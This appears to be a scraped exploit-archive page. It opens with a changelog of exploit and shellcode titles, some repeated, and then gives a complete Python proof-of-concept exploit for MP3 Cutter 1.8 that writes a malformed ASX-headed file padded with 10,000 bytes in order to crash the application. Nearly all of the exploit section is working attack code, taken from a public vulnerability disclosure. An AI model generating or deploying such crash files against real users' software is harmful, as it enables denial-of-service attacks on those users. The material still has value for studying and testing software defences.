
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
49 lines
No EOL
1.6 KiB
Python
Executable file
49 lines
No EOL
1.6 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/41506/info
|
|
|
|
MP3 Cutter is prone to a remote denial-of-service vulnerability.
|
|
|
|
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users.
|
|
|
|
MP3 Cutter 1.8 is vulnerable; other versions may also be affected.
|
|
|
|
##########################################################
|
|
## Legion of Xtremers & Hackers Garage
|
|
## (www.loxian.co.cc) (www.garage4hackers.com)
|
|
## MP3 Cutter 1.8 Crash Exploit
|
|
## http://www.aivsoft.com/downloads/mp3cutter/download.html
|
|
## Author: Prashant a.k.a t3rm!n4t0r
|
|
## c0ntact: happyterminator@gmail.com
|
|
##
|
|
## Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
|
|
#########################################################
|
|
|
|
#exploit.py
|
|
|
|
#MP3 cutter Crash Exploit
|
|
|
|
print " MP3 Cutter Crash Exploit ( mp3 file ) \n"
|
|
|
|
header1 = (
|
|
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
|
|
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
|
|
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
|
|
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
|
|
"\x3D\x22"
|
|
)
|
|
|
|
header2 = (
|
|
"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
|
|
"\x3E\x3C\x2F\x41\x53\x58\x3E"
|
|
)
|
|
|
|
crash = "\x41" * 10000
|
|
|
|
exploit = header1 + crash + header2
|
|
|
|
try:
|
|
out_file = open("crash.mp3",'w')
|
|
out_file.write(exploit)
|
|
out_file.close()
|
|
raw_input("\nExploit file created!\n")
|
|
except:
|
|
print "Error" |